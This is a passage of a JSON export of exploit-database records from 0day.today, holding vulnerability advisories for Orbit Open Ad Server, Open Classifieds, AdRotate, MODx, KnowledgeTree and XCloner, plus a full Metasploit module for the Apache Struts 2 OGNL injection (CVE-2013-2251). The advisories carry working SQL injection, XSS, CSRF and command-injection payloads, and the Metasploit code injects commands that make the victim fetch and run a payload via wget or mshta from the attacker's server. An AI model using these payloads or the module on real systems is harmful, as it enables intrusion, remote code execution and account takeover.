name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Orbit Open Ad Server 1.1.1\n\n# 0day.today [2018-02-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22127"}, {"lastseen": "2018-01-01T23:02:14", "references": [], "description": "Open Classifieds version 2-2.1.2 suffers from a cross site scripting vulnerability.", "edition": 2, "reporter": "High-Tech Bridge", "published": "2014-03-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "Open Classifieds 2-2.1.2 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2024"], "modified": "2014-03-13T00:00:00", "id": "1337DAY-ID-22022", "href": "https://0day.today/exploit/description/22022", "sourceData": "Product: Open Classifieds\r\nVendor: Open Classifieds Team\r\nVulnerable Version(s): 2-2.1.2 and probably prior\r\nTested Version: 2-2.1.2\r\nAdvisory Publication: February 19, 2014 [without technical details]\r\nVendor Notification: February 19, 2014 \r\nVendor Patch: February 20, 2014 \r\nPublic Disclosure: March 12, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-2024\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Open Classifieds, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Open Classifieds: CVE-2014-2024\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed via the URI to \"/shared-apartments-rooms/\" URL. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22)</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Open Classifieds 2-2.1.3\r\n\r\nMore Information:\r\nhttps://github.com/open-classifieds/openclassifieds2/issues/556\r\nhttps://github.com/open-classifieds/openclassifieds2/commit/45ee8fb601a91b8a4238229580a32a4fd8d96ef9\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22022"}, {"lastseen": "2018-04-09T03:37:54", "references": [], "description": "AdRotate version 3.9.4 suffers from a remote SQL injection vulnerability.", "edition": 2, "reporter": "High-Tech Bridge", "published": "2014-02-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "AdRotate 3.9.4 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1854"], "modified": "2014-02-21T00:00:00", "id": "1337DAY-ID-21932", "href": "https://0day.today/exploit/description/21932", "sourceData": "Vendor: AJdG Solutions\r\nVulnerable Version(s): 3.9.4 and probably prior\r\nTested Version: 3.9.4\r\nAdvisory Publication: January 30, 2014 [without technical details]\r\nVendor Notification: January 30, 2014 \r\nVendor Patch: January 31, 2014 \r\nPublic Disclosure: February 20, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-1854\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.\r\n\r\n\r\n1) SQL Injection in AdRotate: CVE-2014-1854\r\n\r\nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to\r\n \"/wp-content/plugins/adrotate/library/clicktracker.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version:\r\n\r\nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==\r\n\r\nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server:\r\nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to AdRotate 3.9.5\r\n\r\nMore Information:\r\nhttp://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/\r\nhttp://wordpress.org/plugins/adrotate/changelog/\r\nhttp://www.adrotateplugin.com/development/\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21932"}, {"lastseen": "2018-04-13T03:42:50", "references": [], "description": "The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \"redirectAction:\" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. This Metasploit module has been tested successfully on Struts 2.3.15 over Tomcat 7, with Windows 2003 SP2 and Ubuntu 10.04 operating systems.", "edition": 2, "reporter": "metasploit", "published": "2013-07-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "modified": "2013-07-26T00:00:00", "id": "1337DAY-ID-21032", "href": "https://0day.today/exploit/description/21032", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\r\n 'Description' => %q{\r\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\r\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\r\n a desired navigational target expression. This mechanism was intended to help with\r\n attaching navigational information to buttons within forms.\r\n\r\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\r\n \"redirectAction:\" is not properly sanitized. Since said information will be\r\n evaluated as OGNL expression against the value stack, this introduces the\r\n possibility to inject server side code.\r\n\r\n This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with\r\n Windows 2003 SP2 and Ubuntu 10.04 operating systems.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Takeshi Terada', # Vulnerability discovery\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit modules\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2251' ],\r\n [ 'OSVDB', '95405' ],\r\n [ 'BID', '61189' ],\r\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\r\n ],\r\n 'Platform' => [ 'win', 'linux'],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => 'Jul 2 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\r\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\r\n # It isn't OptPath becuase it's a *remote* path\r\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\r\n ], self.class)\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type == \"meterpreter\"\r\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\r\n end\r\n\r\n @dropped_files.delete_if do |file|\r\n false unless file =~ /\\.exe/\r\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\r\n if session.type == \"meterpreter\"\r\n begin\r\n wintemp = session.fs.file.expand_path(\"%TEMP%\")\r\n win_file = \"#{wintemp}\\\\#{win_file}\"\r\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\r\n session.fs.file.rm(win_file)\r\n print_good(\"Deleted #{file}\")\r\n true\r\n rescue ::Rex::Post::Meterpreter::RequestError\r\n print_error(\"Failed to delete #{win_file}\")\r\n false\r\n end\r\n end\r\n end\r\n\r\n super\r\n end\r\n\r\n def start_http_service\r\n #do not use SSL\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\r\n start_service({\r\n 'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => '/'\r\n }\r\n })\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n\r\n return service_url\r\n end\r\n\r\n def check\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n print_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def auto_target\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\")\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n if res.headers['Location'] =~ /:\\\\/\r\n return targets[1] # Windows\r\n else\r\n return targets[2] # Linux\r\n end\r\n end\r\n\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\r\n\r\n end\r\n\r\n def exploit_linux\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n @pl = @exe\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # download payload\r\n #\r\n fname = datastore['WritableDir']\r\n fname = \"#{fname}/\" unless fname =~ %r'/$'\r\n fname << downfile\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(fname)\r\n\r\n #\r\n # chmod\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # execute\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n end\r\n\r\n def exploit_windows\r\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\r\n @pl = build_hta\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # execute hta\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(@var_exename)\r\n end\r\n\r\n def exploit\r\n if target.name =~ /Automatic/\r\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\r\n my_target = auto_target\r\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\r\n else\r\n my_target = target\r\n end\r\n\r\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\r\n @exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\r\n\r\n if my_target.name =~ /Linux/\r\n if datastore['PAYLOAD'] =~ /windows/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\r\n end\r\n exploit_linux\r\n elsif my_target.name =~ /Windows/\r\n if datastore['PAYLOAD'] =~ /linux/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\r\n end\r\n exploit_windows\r\n end\r\n end\r\n\r\n # Handle incoming requests from the server\r\n def on_request_uri(cli, request)\r\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @pl_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n # wait for the data to be sent\r\n def wait_payload\r\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\r\n\r\n waited = 0\r\n while (not @pl_sent)\r\n select(nil, nil, nil, 1)\r\n waited += 1\r\n if (waited > datastore['HTTP_DELAY'])\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\r\n end\r\n end\r\n end\r\n\r\n def build_hta\r\n var_shellobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj_file = rand_text_alpha(rand(5)+5);\r\n var_vbsname = rand_text_alpha(rand(5)+5);\r\n var_writedir = rand_text_alpha(rand(5)+5);\r\n\r\n var_origLoc = rand_text_alpha(rand(5)+5);\r\n var_byteArray = rand_text_alpha(rand(5)+5);\r\n var_writestream = rand_text_alpha(rand(5)+5);\r\n var_strmConv = rand_text_alpha(rand(5)+5);\r\n\r\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\r\n # even when executing it as an \"HTA\" application\r\n # The encoding code has been stolen from ie_unsafe_scripting.rb\r\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\r\n\r\n # Build the content that will end up in the .vbs file\r\n vbs_content = Rex::Text.to_hex(%Q|\r\nDim #{var_origLoc}, s, #{var_byteArray}\r\n#{var_origLoc} = SetLocale(1033)\r\n|)\r\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\r\n # for conversion with ADODB.Stream\r\n vbs_ary = []\r\n # The output of this loop needs to be as small as possible since it\r\n # gets repeated for every byte of the executable, ballooning it by a\r\n # factor of about 80k (the current size of the exe template). In its\r\n # current form, it's down to about 4MB on the wire\r\n @exe.each_byte do |b|\r\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\r\n end\r\n vbs_content << vbs_ary.join(\"\")\r\n\r\n # Continue with the rest of the vbs file;\r\n # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent\r\n # Then use ADODB.Stream again to write the binary to file.\r\n #print_status(\"Finishing vbs...\");\r\n vbs_content << Rex::Text.to_hex(%Q|\r\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\r\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\r\n\r\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\r\n\r\n#{var_strmConv}.Type = 2\r\n#{var_strmConv}.Charset = \"x-ansi\"\r\n#{var_strmConv}.Open\r\n#{var_strmConv}.WriteText s, 0\r\n#{var_strmConv}.Position = 0\r\n#{var_strmConv}.Type = 1\r\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\r\n\r\nSetLocale(#{var_origLoc})|)\r\n\r\n hta = <<-EOS\r\n <script>\r\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\r\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\r\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\r\n\r\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\r\n #{var_fsobj_file}.Close();\r\n\r\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\r\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\r\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\r\n window.close();\r\n </script>\r\n EOS\r\n\r\n return hta\r\n end\r\n\r\n\r\nend\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21032"}, {"lastseen": "2018-03-14T00:26:43", "references": [], "description": "MODx versions prior to 2.2.14 suffer from multiple remote blind SQL injection vulnerabilities.", "edition": 2, "reporter": "Craig Arendt", "published": "2014-04-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "MODx Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2736"], "modified": "2014-04-23T00:00:00", "id": "1337DAY-ID-22168", "href": "https://0day.today/exploit/description/22168", "sourceData": "Product description:\r\n============\r\nMODX (originally MODx) is a free, open source content management system and web application framework for publishing content on the world wide web and intranets.\r\n============\r\n\r\nMODX Revolution Blind SQL Injection (CVE-2014-2736)\r\n============\r\nThe application is vulnerable to blind SQL injection which is exploitable through the session ID supplied by the user. This issue is exploitable without authentication.\r\n\r\nDetails:\r\n----------------------\r\nThe vulnerability is triggered where the session ID is inserted into the modx_session table. In this location it is possible to inject SQL sub queries that will be executed by the application.\r\n\r\nThis issue is exploitable without authentication by passing crafted SQL subqueries into the session ID (PHPSESSID) passed to /index.php. Passing a carefully crafted subquery into the application will cause the application to execute arbitrary SQL queries within the context of database user privileges. Successful injection will cause the application to accept the session and not set a new cookie.\r\n\r\nPOC is withheld.\r\n\r\nAuthentication is not required to exploit this issue.\r\n----------------------\r\n\r\n\r\nMODX Revolution Blind SQL Injection (CVE-2014-2736):\r\n============\r\nThe messaging and manager functionalities of MODX, are vulnerable to blind SQL injection. Access to these functions requires privileged access.\r\n\r\nDetails:\r\n----------------------\r\n1. The 'user' parameter of /connectors/security/message.php is vulnerable to blind SQL injection.\r\n2. The 'id' parameter of /manager/index.php is vulnerable to blind SQL injection.\r\n\r\nAuthentication is required to exploit these vulnerabilities.\r\n----------------------\r\n\r\nThe CVE project assigned CVE-2014-2736 to all these issues.\r\n\r\n\r\nVendor Response:\r\nUpgrade to MODX 2.2.14 or higher.\r\nhttp://modx.com/blog/2014/04/04/revolution-2.2.14/\r\n\r\nTimeline:\r\n============\r\nMarch 10, 2014, Vulnerability identified\r\nMarch 10, 2014, Product vendor notification\r\nMarch 10, 2014, Vendor review\r\nMarch 11, 2014, Vulnerability reported\r\nMarch 15, 2014, Vulnerability identified\r\nMarch 15, 2014, Vulnerability reported\r\nMarch 17, 2014, Vendor confirmed issues\r\nMarch 20, 2014, Vendor fix confirmed\r\nApril 4, 2014, Patch released\r\nApril 20, 2014, Disclosure\r\n\r\nResearch:\r\n============\r\nCraig Arendt, Stratum Security\r\nhttp://www.stratumsecurity.com\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22168"}, {"lastseen": "2018-04-12T07:53:05", "references": [], "edition": 2, "description": "KnowledgeTree suffers from a remote blind SQL injection vulnerability.", "reporter": "Craig Arendt", "published": "2014-04-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "KnowledgeTree Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2737"], "modified": "2014-04-23T00:00:00", "id": "1337DAY-ID-22167", "href": "https://0day.today/exploit/description/22167", "sourceData": "Product description:\r\n============\r\nKnowledgeTree is document management system that makes it easy to secure, share, track and manage the documents and records.\r\n============\r\n\r\nKnowledgeTree Blind SQL Injection (CVE-2014-2737)\r\n============\r\n\r\nThe application is vulnerable to blind SQL injection which is exploitable through /webservice/clienttools/services/mdownload.php. This issue is exploitable without authentication.\r\n\r\nDetails:\r\n----------------------\r\nThe vulnerable code is in the get_active_session function in the KTAPI_UserSession class. In this location the query isn't parameterized when looking up the active session. In the getFileName function an unvalidated 'u' parameter is passed.\r\n\r\nExploitable from:\r\n/webservice/clienttools/services/mdownload.php\r\n\r\nPOC is withheld.\r\nThe CVE project assigned CVE-2014-2737 to this issue.\r\n\r\nVendor Response:\r\n1. The open source project was shut down, and the vendor doesn\u2019t have a place to post a patch. The vendor does have a patch available that works for the open source project if you ask them. \r\n2. Upgrade to the KnowledgeTree on premise product which is patched against this issue.\r\n\r\nTimeline:\r\n============\r\nFebruary 25, 2014, Vulnerability identified\r\nFebruary 25, 2014, Product vendor notification\r\nMarch 14, 2014, Vendor confirmed the issue\r\nMarch 26, 2014, Vendor fix reviewed\r\nMarch 28, 2014, Vendor fix confirmed\r\nMarch 28, 2014, Vendor has a patch available for the open source product\r\nApril 20, 2014, Disclosure\r\n\r\nResearch:\r\n============\r\nCraig Arendt, Stratum Security\r\nhttp://www.stratumsecurity.com\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22167"}, {"lastseen": "2018-02-17T23:27:46", "references": [], "edition": 2, "description": "XCloner Standalone version 3.5 suffers from a cross site request forgery vulnerability.", "reporter": "High-Tech Bridge", "published": "2014-04-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "zdt", "title": "XCloner Standalone 3.5 Cross Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2579"], "modified": "2014-04-10T00:00:00", "id": "1337DAY-ID-22128", "href": "https://0day.today/exploit/description/22128", "sourceData": "Product: XCloner Standalone\r\nVendor: XCloner\r\nVulnerable Version(s): 3.5 and probably prior\r\nTested Version: 3.5\r\nAdvisory Publication: March 14, 2014 [without technical details]\r\nVendor Notification: March 14, 2014 \r\nPublic Disclosure: April 9, 2014 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-2579\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in XCloner Standalone, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the website.\r\n\r\n\r\n1. \u0421ross-Site Request Forgery (CSRF) in XCloner Standalone: CVE-2014-2579\r\n\r\n1.1 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and change administrator\u2019s password.\r\n\r\nThe exploitation example below changes password for user 'login' to 'immuniweb':\r\n\r\n\r\n<form action=\"http://[host]/index2.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"jcuser\" value=\"login\">\r\n<input type=\"hidden\" name=\"jcpass\" value=\"password\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_cloner\">\r\n<input type=\"hidden\" name=\"task\" value=\"config\">\r\n<input type=\"hidden\" name=\"action\" value=\"save\">\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n</form>\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and execute arbitrary system commands on vulnerable system with privileges of the webserver.\r\n\r\nThe exploitation example below uses the 'echo' system command to write 'immuniweb' string into file '/var/www/file.php':\r\n\r\nhttp://[host]/index2.php?option=com_cloner&task=generate&bname=1&dbbackup=1&cron_access=1&dbbackup_comp=||%20echo immuniweb > /var/www/file.php%20||\r\n\r\nSuccessful exploitation of this vulnerability requires that options 'enable_db_backup' and 'sql_mem' are enabled in application\u2019s configuration file.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nVendor ignored:\r\n- 6 notifications by email\r\n- 4 notifications via contact form\r\n- 1 notification via twitter. \r\n\r\nCurrently we are not aware of any official solution for this vulnerability. As a temporary solution it is recommended to remove the vulnerable script or restrict access to it via WAF of .htaccess.\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22128"}], "seebug": [{"lastseen": "2017-11-19T17:41:13", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], 